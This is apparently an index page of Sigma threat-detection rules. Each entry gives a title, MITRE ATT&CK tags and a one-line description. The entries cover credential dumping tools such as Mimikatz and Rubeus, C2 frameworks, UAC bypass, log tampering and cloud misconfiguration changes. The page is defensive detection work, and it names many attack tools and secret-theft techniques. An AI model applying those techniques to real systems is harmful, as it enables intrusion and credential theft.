Aug 12, 2024 · attack.defense-evasion attack.impact attack.t1070 attack.t1485 ·
Share on:

Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others).

Read More
Function Call From Undocumented COM Interface EditionUpgradeManager

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables.

Read More
GAC DLL Loaded Via Office Applications

Aug 12, 2024 · attack.execution attack.t1204.002 ·
Share on:

Detects any GAC DLL being loaded by an Office Product

Read More
GALLIUM Artefacts - Builtin

Aug 12, 2024 · attack.credential-access attack.command-and-control attack.t1071 detection.emerging-threats ·
Share on:

Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.

Read More
Gatekeeper Bypass via Xattr

Aug 12, 2024 · attack.defense-evasion attack.t1553.001 ·
Share on:

Detects macOS Gatekeeper bypass via xattr utility

Read More
GatherNetworkInfo.VBS Reconnaissance Script Output

Aug 12, 2024 · attack.discovery ·
Share on:

Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".

Read More
Get-ADUser Enumeration Using UserAccountControl Flags

Aug 12, 2024 · attack.discovery attack.t1033 ·
Share on:

Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.

Read More
Github Delete Action Invoked

Aug 12, 2024 · attack.impact attack.collection attack.t1213.003 ·
Share on:

Detects delete action in the Github audit logs for codespaces, environment, project and repo.

Read More
Github Fork Private Repositories Setting Enabled/Cleared

Aug 12, 2024 · attack.persistence attack.t1020 attack.t1537 ·
Share on:

Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).

Read More
Github High Risk Configuration Disabled

Aug 12, 2024 · attack.credential-access attack.defense-evasion attack.persistence attack.t1556 ·
Share on:

Detects when a user disables a critical security feature for an organization.

Read More
Github New Secret Created

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.initial-access attack.t1078.004 ·
Share on:

Detects when a user creates action secret for the organization, environment, codespaces or repository.

Read More
Github Outside Collaborator Detected

Aug 12, 2024 · attack.persistence attack.collection attack.t1098.001 attack.t1098.003 attack.t1213.003 ·
Share on:

Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.

Read More
Github Repository/Organization Transferred

Aug 12, 2024 · attack.persistence attack.t1020 attack.t1537 ·
Share on:

Detects when a repository or an organization is being transferred to another location.

Read More
Github Secret Scanning Feature Disabled

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects if the secret scanning feature is disabled for an enterprise or repository.

Read More
Github Self Hosted Runner Changes Detected

Aug 12, 2024 · attack.impact attack.discovery attack.collection attack.defense-evasion attack.persistence attack.privilege-escalation attack.initial-access attack.t1526 attack.t1213.003 attack.t1078.004 ·
Share on:

A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.

Read More
Github SSH Certificate Configuration Changed

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1078.004 ·
Share on:

Detects when changes are made to the SSH certificate configuration of the organization.

Read More
Goofy Guineapig Backdoor IOC

Aug 12, 2024 · attack.execution attack.defense-evasion detection.emerging-threats ·
Share on:

Detects malicious indicators seen used by the Goofy Guineapig malware

Read More
Goofy Guineapig Backdoor Potential C2 Communication

Aug 12, 2024 · attack.command-and-control detection.emerging-threats ·
Share on:

Detects potential C2 communication related to Goofy Guineapig backdoor

Read More
Goofy Guineapig Backdoor Service Creation

Aug 12, 2024 · attack.persistence detection.emerging-threats ·
Share on:

Detects service creation persistence used by the Goofy Guineapig backdoor

Read More
Google Cloud DNS Zone Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a DNS Zone is modified or deleted in Google Cloud.

Read More
Google Cloud Firewall Modified or Deleted

Aug 12, 2024 · attack.defense-evasion attack.t1562 ·
Share on:

Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).

Read More
Google Cloud Kubernetes Admission Controller

Aug 12, 2024 · attack.persistence attack.t1078 attack.credential-access attack.t1552 attack.t1552.007 ·
Share on:

Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.

Read More
Google Cloud Kubernetes CronJob

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.execution ·
Share on:

Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.

Read More
Google Cloud Kubernetes RoleBinding

Aug 12, 2024 · attack.credential-access ·
Share on:

Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.

Read More
Google Cloud Kubernetes Secrets Modified or Deleted

Aug 12, 2024 · attack.credential-access ·
Share on:

Identifies when the Secrets are Modified or Deleted.

Read More
Google Cloud Re-identifies Sensitive Information

Aug 12, 2024 · attack.impact attack.t1565 ·
Share on:

Identifies when sensitive information is re-identified in google Cloud.

Read More
Google Cloud Service Account Disabled or Deleted

Aug 12, 2024 · attack.impact attack.t1531 ·
Share on:

Identifies when a service account is disabled or deleted in Google Cloud.

Read More
Google Cloud Service Account Modified

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a service account is modified in Google Cloud.

Read More
Google Cloud SQL Database Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Detect when a Cloud SQL DB has been modified or deleted.

Read More
Google Cloud Storage Buckets Enumeration

Aug 12, 2024 · attack.discovery ·
Share on:

Detects when storage bucket is enumerated in Google Cloud.

Read More
Google Cloud Storage Buckets Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Detects when storage bucket is modified or deleted in Google Cloud.

Read More
Google Cloud VPN Tunnel Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.

Read More
Google Full Network Traffic Packet Capture

Aug 12, 2024 · attack.collection attack.t1074 ·
Share on:

Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.

Read More
Google Workspace Application Removed

Aug 12, 2024 · attack.impact ·
Share on:

Detects when an an application is removed from Google Workspace.

Read More
Google Workspace Granted Domain API Access

Aug 12, 2024 · attack.persistence attack.t1098 ·
Share on:

Detects when an API access service account is granted domain authority.

Read More
Google Workspace MFA Disabled

Aug 12, 2024 · attack.impact ·
Share on:

Detects when multi-factor authentication (MFA) is disabled.

Read More
Google Workspace Role Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Detects when an a role is modified or deleted in Google Workspace.

Read More
Google Workspace Role Privilege Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Detects when an a role privilege is deleted in Google Workspace.

Read More
Google Workspace User Granted Admin Privileges

Aug 12, 2024 · attack.persistence attack.t1098 ·
Share on:

Detects when an Google Workspace user is granted admin privileges.

Read More
GoToAssist Temporary Installation Artefact

Aug 12, 2024 · attack.command-and-control attack.t1219 ·
Share on:

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Read More
Gpresult Display Group Policy Information

Aug 12, 2024 · attack.discovery attack.t1615 ·
Share on:

Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information

Read More
Gpscript Execution

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy

Read More
Grafana Path Traversal Exploitation CVE-2021-43798

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-43798 detection.emerging-threats ·
Share on:

Detects a successful Grafana path traversal exploitation

Read More
Granting Of Permissions To An Account

Aug 12, 2024 · attack.persistence attack.t1098.003 ·
Share on:

Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.

Read More
Greedy File Deletion Using Del

Aug 12, 2024 · attack.defense-evasion attack.t1070.004 ·
Share on:

Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.

Read More
Greenbug Espionage Group Indicators

Aug 12, 2024 · attack.g0049 attack.execution attack.t1059.001 attack.command-and-control attack.t1105 attack.defense-evasion attack.t1036.005 detection.emerging-threats ·
Share on:

Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec

Read More
Griffon Malware Attack Pattern

Aug 12, 2024 · attack.execution detection.emerging-threats ·
Share on:

Detects process execution patterns related to Griffon malware as reported by Kaspersky

Read More
Group Has Been Deleted Via Groupdel

Aug 12, 2024 · attack.impact attack.t1531 ·
Share on:

Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks

Read More
Group Membership Reconnaissance Via Whoami.EXE

Aug 12, 2024 · attack.discovery attack.t1033 ·
Share on:

Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.

Read More
Guacamole Two Users Sharing Session Anomaly

Aug 12, 2024 · attack.credential-access attack.t1212 ·
Share on:

Detects suspicious session with two users present

Read More
Guest Account Enabled Via Sysadminctl

Aug 12, 2024 · attack.initial-access attack.t1078 attack.t1078.001 ·
Share on:

Detects attempts to enable the guest account using the sysadminctl utility

Read More
Guest User Invited By Non Approved Inviters

Aug 12, 2024 · attack.persistence attack.defense-evasion attack.t1078.004 ·
Share on:

Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.

Read More
Guest Users Invited To Tenant By Non Approved Inviters

Aug 12, 2024 · attack.initial-access attack.t1078 ·
Share on:

Detects guest users being invited to tenant by non-approved inviters

Read More
GUI Input Capture - macOS

Aug 12, 2024 · attack.credential-access attack.t1056.002 ·
Share on:

Detects attempts to use system dialog prompts to capture user credentials

Read More
Gzip Archive Decode Via PowerShell

Aug 12, 2024 · attack.command-and-control attack.t1132.001 ·
Share on:

Detects attempts of decoding encoded Gzip archives via PowerShell.

Read More
Hack Tool User Agent

Aug 12, 2024 · attack.initial-access attack.t1190 attack.credential-access attack.t1110 ·
Share on:

Detects suspicious user agent strings user by hack tools in proxy logs

Read More
HackTool - ADCSPwn Execution

Aug 12, 2024 · attack.credential-access attack.t1557.001 ·
Share on:

Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service

Read More
HackTool - BabyShark Agent Default URL Pattern

Aug 12, 2024 · attack.command-and-control attack.t1071.001 ·
Share on:

Detects Baby Shark C2 Framework default communication patterns

Read More
HackTool - Bloodhound/Sharphound Execution

Aug 12, 2024 · attack.discovery attack.t1087.001 attack.t1087.002 attack.t1482 attack.t1069.001 attack.t1069.002 attack.execution attack.t1059.001 ·
Share on:

Detects command line parameters used by Bloodhound and Sharphound hack tools

Read More
HackTool - CACTUSTORCH Remote Thread Creation

Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1055.012 attack.t1059.005 attack.t1059.007 attack.t1218.005 ·
Share on:

Detects remote thread creation from CACTUSTORCH as described in references.

Read More
HackTool - Certify Execution

Aug 12, 2024 · attack.discovery attack.credential-access attack.t1649 ·
Share on:

Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.

Read More
HackTool - CobaltStrike BOF Injection Pattern

Aug 12, 2024 · attack.execution attack.t1106 attack.defense-evasion attack.t1562.001 ·
Share on:

Detects a typical pattern of a CobaltStrike BOF which inject into other processes

Read More
HackTool - CobaltStrike Malleable Profile Patterns - Proxy

Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1071.001 ·
Share on:

Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).

Read More
HackTool - Covenant PowerShell Launcher

Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1059.001 attack.t1564.003 ·
Share on:

Detects suspicious command lines used in Covenant luanchers

Read More
HackTool - CrackMapExec Execution

Aug 12, 2024 · attack.execution attack.persistence attack.privilege-escalation attack.credential-access attack.discovery attack.t1047 attack.t1053 attack.t1059.003 attack.t1059.001 attack.t1110 attack.t1201 ·
Share on:

This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.

Read More
HackTool - CrackMapExec Execution Patterns

Aug 12, 2024 · attack.execution attack.t1047 attack.t1053 attack.t1059.003 attack.t1059.001 attack.s0106 ·
Share on:

Detects various execution patterns of the CrackMapExec pentesting framework

Read More
HackTool - CrackMapExec File Indicators

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects file creation events with filename patterns used by CrackMapExec.

Read More
HackTool - CrackMapExec PowerShell Obfuscation

Aug 12, 2024 · attack.execution attack.t1059.001 attack.defense-evasion attack.t1027.005 ·
Share on:

The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.

Read More
HackTool - CrackMapExec Process Patterns

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects suspicious process patterns found in logs when CrackMapExec is used

Read More
HackTool - Credential Dumping Tools Named Pipe Created

Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 ·
Share on:

Detects well-known credential dumping tools execution via specific named pipe creation

Read More
HackTool - Default PowerSploit/Empire Scheduled Task Creation

Aug 12, 2024 · attack.execution attack.persistence attack.privilege-escalation attack.s0111 attack.g0022 attack.g0060 car.2013-08-001 attack.t1053.005 attack.t1059.001 ·
Share on:

Detects the creation of a schtask via PowerSploit or Empire Default Configuration.

Read More
HackTool - DiagTrackEoP Default Named Pipe

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.

Read More
HackTool - Dumpert Process Dumper Default File

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory

Read More
HackTool - Empire PowerShell Launch Parameters

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects suspicious powershell command line parameters used in Empire

Read More
HackTool - Empire PowerShell UAC Bypass

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 car.2019-04-001 ·
Share on:

Detects some Empire PowerShell UAC bypass methods

Read More
HackTool - Empire UserAgent URI Combo

Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1071.001 ·
Share on:

Detects user agent and URI paths used by empire agents

Read More
HackTool - F-Secure C3 Load by Rundll32

Aug 12, 2024 · attack.defense-evasion attack.t1218.011 ·
Share on:

F-Secure C3 produces DLLs with a default exported StartNodeRelay function.

Read More
HackTool - HandleKatz Duplicating LSASS Handle

Aug 12, 2024 · attack.execution attack.t1106 attack.defense-evasion attack.t1003.001 ·
Share on:

Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles

Read More
HackTool - Hashcat Password Cracker Execution

Aug 12, 2024 · attack.credential-access attack.t1110.002 ·
Share on:

Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against

Read More
HackTool - Htran/NATBypass Execution

Aug 12, 2024 · attack.command-and-control attack.t1090 attack.s0040 ·
Share on:

Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)

Read More
HackTool - Hydra Password Bruteforce Execution

Aug 12, 2024 · attack.credential-access attack.t1110 attack.t1110.001 ·
Share on:

Detects command line parameters used by Hydra password guessing hack tool

Read More
HackTool - Impacket Tools Execution

Aug 12, 2024 · attack.execution attack.t1557.001 ·
Share on:

Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)

Read More
HackTool - Inveigh Execution

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool

Read More
HackTool - Inveigh Execution Artefacts

Aug 12, 2024 · attack.command-and-control attack.t1219 ·
Share on:

Detects the presence and execution of Inveigh via dropped artefacts

Read More
HackTool - Jlaive In-Memory Assembly Execution

Aug 12, 2024 · attack.execution attack.t1059.003 ·
Share on:

Detects the use of Jlaive to execute assemblies in a copied PowerShell

Read More
HackTool - Koadic Execution

Aug 12, 2024 · attack.execution attack.t1059.003 attack.t1059.005 attack.t1059.007 ·
Share on:

Detects command line parameters used by Koadic hack tool

Read More
HackTool - Koh Default Named Pipe

Aug 12, 2024 · attack.privilege-escalation attack.credential-access attack.t1528 attack.t1134.001 ·
Share on:

Detects creation of default named pipes used by the Koh tool

Read More
HackTool - KrbRelay Execution

Aug 12, 2024 · attack.credential-access attack.t1558.003 ·
Share on:

Detects the use of KrbRelay, a Kerberos relaying tool

Read More
HackTool - KrbRelayUp Execution

Aug 12, 2024 · attack.credential-access attack.t1558.003 attack.lateral-movement attack.t1550.003 ·
Share on:

Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced

Read More
HackTool - LittleCorporal Generated Maldoc Injection

Aug 12, 2024 · attack.execution attack.t1204.002 attack.t1055.003 ·
Share on:

Detects the process injection of a LittleCorporal generated Maldoc.

Read More
HackTool - Mimikatz Execution

Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 attack.t1003.006 ·
Share on:

Detection well-known mimikatz command line arguments

Read More
HackTool - Mimikatz Kirbi File Creation

Aug 12, 2024 · attack.credential-access attack.t1558 ·
Share on:

Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.

Read More
HackTool - NPPSpy Hacktool Usage

Aug 12, 2024 · attack.credential-access ·
Share on:

Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file

Read More
HackTool - Potential CobaltStrike Process Injection

Aug 12, 2024 · attack.defense-evasion attack.t1055.001 ·
Share on:

Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons

Read More
HackTool - Potential Impacket Lateral Movement Activity

Aug 12, 2024 · attack.execution attack.t1047 attack.lateral-movement attack.t1021.003 ·
Share on:

Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework

Read More
HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump

Aug 12, 2024 · attack.credential-access attack.t1003 ·
Share on:

Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.

Read More
HackTool - PowerTool Execution

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files

Read More
HackTool - Powerup Write Hijack DLL

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.defense-evasion attack.t1574.001 ·
Share on:

Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).

Read More
HackTool - PurpleSharp Execution

Aug 12, 2024 · attack.t1587 attack.resource-development ·
Share on:

Detects the execution of the PurpleSharp adversary simulation tool

Read More
HackTool - Pypykatz Credentials Dumping Activity

Aug 12, 2024 · attack.credential-access attack.t1003.002 ·
Share on:

Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored

Read More
HackTool - Quarks PwDump Execution

Aug 12, 2024 · attack.credential-access attack.t1003.002 ·
Share on:

Detects usage of the Quarks PwDump tool via commandline arguments

Read More
HackTool - QuarksPwDump Dump File

Aug 12, 2024 · attack.credential-access attack.t1003.002 ·
Share on:

Detects a dump file written by QuarksPwDump password dumper

Read More
HackTool - RedMimicry Winnti Playbook Execution

Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1106 attack.t1059.003 attack.t1218.011 ·
Share on:

Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility

Read More
HackTool - RemoteKrbRelay Execution

Aug 12, 2024 · attack.credential-access attack.t1558.003 ·
Share on:

Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.

Read More
HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators

Aug 12, 2024 · attack.command-and-control attack.t1219 ·
Share on:

Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.

Read More
HackTool - Rubeus Execution

Aug 12, 2024 · attack.credential-access attack.t1003 attack.t1558.003 attack.lateral-movement attack.t1550.003 ·
Share on:

Detects the execution of the hacktool Rubeus via PE information of command line parameters

Read More
HackTool - Rubeus Execution - ScriptBlock

Aug 12, 2024 · attack.credential-access attack.t1003 attack.t1558.003 attack.lateral-movement attack.t1550.003 ·
Share on:

Detects the execution of the hacktool Rubeus using specific command line flags

Read More
HackTool - SafetyKatz Dump Indicator

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects default lsass dump filename generated by SafetyKatz.

Read More
HackTool - SafetyKatz Execution

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects the execution of the hacktool SafetyKatz via PE information and default Image name

Read More
HackTool - SecurityXploded Execution

Aug 12, 2024 · attack.credential-access attack.t1555 ·
Share on:

Detects the execution of SecurityXploded Tools

Read More
HackTool - SharpChisel Execution

Aug 12, 2024 · attack.command-and-control attack.t1090.001 ·
Share on:

Detects usage of the Sharp Chisel via the commandline arguments

Read More
HackTool - SharpDPAPI Execution

Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1134.001 attack.t1134.003 ·
Share on:

Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.

Read More
HackTool - SharPersist Execution

Aug 12, 2024 · attack.persistence attack.t1053 ·
Share on:

Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms

Read More
HackTool - SharpEvtMute Execution

Aug 12, 2024 · attack.defense-evasion attack.t1562.002 ·
Share on:

Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs

Read More
HackTool - SharpImpersonation Execution

Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1134.001 attack.t1134.003 ·
Share on:

Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively

Read More
HackTool - SharpLDAPmonitor Execution

Aug 12, 2024 · attack.discovery ·
Share on:

Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.

Read More
HackTool - SharpLdapWhoami Execution

Aug 12, 2024 · attack.discovery attack.t1033 car.2016-03-001 ·
Share on:

Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller

Read More
HackTool - SharpUp PrivEsc Tool Execution

Aug 12, 2024 · attack.privilege-escalation attack.t1615 attack.t1569.002 attack.t1574.005 ·
Share on:

Detects the use of SharpUp, a tool for local privilege escalation

Read More
HackTool - SharpView Execution

Aug 12, 2024 · attack.discovery attack.t1049 attack.t1069.002 attack.t1482 attack.t1135 attack.t1033 ·
Share on:

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

Read More
HackTool - SILENTTRINITY Stager DLL Load

Aug 12, 2024 · attack.command-and-control attack.t1071 ·
Share on:

Detects SILENTTRINITY stager dll loading activity

Read More
HackTool - SILENTTRINITY Stager Execution

Aug 12, 2024 · attack.command-and-control attack.t1071 ·
Share on:

Detects SILENTTRINITY stager use via PE metadata

Read More
HackTool - Sliver C2 Implant Activity Pattern

Aug 12, 2024 · attack.execution attack.t1059 ·
Share on:

Detects process activity patterns as seen being used by Sliver C2 framework implants

Read More
HackTool - SysmonEnte Execution

Aug 12, 2024 · attack.defense-evasion attack.t1562.002 ·
Share on:

Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon

Read More
HackTool - TruffleSnout Execution

Aug 12, 2024 · attack.discovery attack.t1482 ·
Share on:

Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.

Read More
HackTool - Typical HiveNightmare SAM File Export

Aug 12, 2024 · attack.credential-access attack.t1552.001 cve.2021-36934 ·
Share on:

Detects files written by the different tools that exploit HiveNightmare

Read More
HackTool - winPEAS Execution

Aug 12, 2024 · attack.privilege-escalation attack.t1082 attack.t1087 attack.t1046 ·
Share on:

WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz

Read More
HackTool - WinRM Access Via Evil-WinRM

Aug 12, 2024 · attack.lateral-movement attack.t1021.006 ·
Share on:

Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Read More
HackTool - Wmiexec Default Powershell Command

Aug 12, 2024 · attack.defense-evasion attack.lateral-movement ·
Share on:

Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script

Read More
HackTool - XORDump Execution

Aug 12, 2024 · attack.defense-evasion attack.t1036 attack.t1003.001 ·
Share on:

Detects suspicious use of XORDump process memory dumping utility

Read More
Hacktool Execution - PE Metadata

Aug 12, 2024 · attack.credential-access attack.t1588.002 attack.t1003 ·
Share on:

Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed

Read More
Hacktool Ruler

Aug 12, 2024 · attack.discovery attack.execution attack.t1087 attack.t1114 attack.t1059 attack.t1550.002 ·
Share on:

This events that are generated when using the hacktool Ruler by Sensepost

Read More
HackTool Service Registration or Execution

Aug 12, 2024 · attack.execution attack.t1569.002 attack.s0029 ·
Share on:

Detects installation or execution of services

Read More
HAFNIUM Exchange Exploitation Activity

Aug 12, 2024 · attack.persistence attack.t1546 attack.t1053 attack.g0125 detection.emerging-threats ·
Share on:

Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers

Read More
Hardware Model Reconnaissance Via Wmic.EXE

Aug 12, 2024 · attack.execution attack.t1047 car.2016-03-002 ·
Share on:

Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information

Read More
Harvesting Of Wifi Credentials Via Netsh.EXE

Aug 12, 2024 · attack.discovery attack.credential-access attack.t1040 ·
Share on:

Detect the harvesting of wifi credentials using netsh.exe

Read More
Hermetic Wiper TG Process Patterns

Aug 12, 2024 · attack.execution attack.lateral-movement attack.t1021.001 detection.emerging-threats ·
Share on:

Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022

Read More
HH.EXE Execution

Aug 12, 2024 · attack.defense-evasion attack.t1218.001 ·
Share on:

Detects the execution of "hh.exe" to open ".chm" files.

Read More
Hidden Executable In NTFS Alternate Data Stream

Aug 12, 2024 · attack.defense-evasion attack.s0139 attack.t1564.004 ·
Share on:

Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash

Read More
Hidden Files and Directories

Aug 12, 2024 · attack.defense-evasion attack.t1564.001 ·
Share on:

Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character

Read More
Hidden Local User Creation

Aug 12, 2024 · attack.persistence attack.t1136.001 ·
Share on:

Detects the creation of a local hidden user account which should not happen for event ID 4720.

Read More
Hidden Powershell in Link File Pattern

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects events that appear when a user click on a link file with a powershell command in it

Read More
Hidden User Creation

Aug 12, 2024 · attack.defense-evasion attack.t1564.002 ·
Share on:

Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option

Read More
Hide Schedule Task Via Index Value Tamper

Aug 12, 2024 · attack.defense-evasion attack.t1562 ·
Share on:

Detects when the "index" value of a scheduled task is modified from the registry Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)

Read More
Hiding Files with Attrib.exe

Aug 12, 2024 · attack.defense-evasion attack.t1564.001 ·
Share on:

Detects usage of attrib.exe to hide files from users.

Read More
Hijack Legit RDP Session to Move Laterally

Aug 12, 2024 · attack.command-and-control attack.t1219 ·
Share on:

Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder

Read More
History File Deletion

Aug 12, 2024 · attack.impact attack.t1565.001 ·
Share on:

Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity

Read More
Host Without Firewall

Aug 12, 2024 ·
Share on:

Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.

Read More
HTML Help HH.EXE Suspicious Child Process

Aug 12, 2024 · attack.defense-evasion attack.execution attack.initial-access attack.t1047 attack.t1059.001 attack.t1059.003 attack.t1059.005 attack.t1059.007 attack.t1218 attack.t1218.001 attack.t1218.010 attack.t1218.011 attack.t1566 attack.t1566.001 ·
Share on:

Detects a suspicious child process of a Microsoft HTML Help (HH.exe)

Read More
HTTP Request With Empty User Agent

Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1071.001 ·
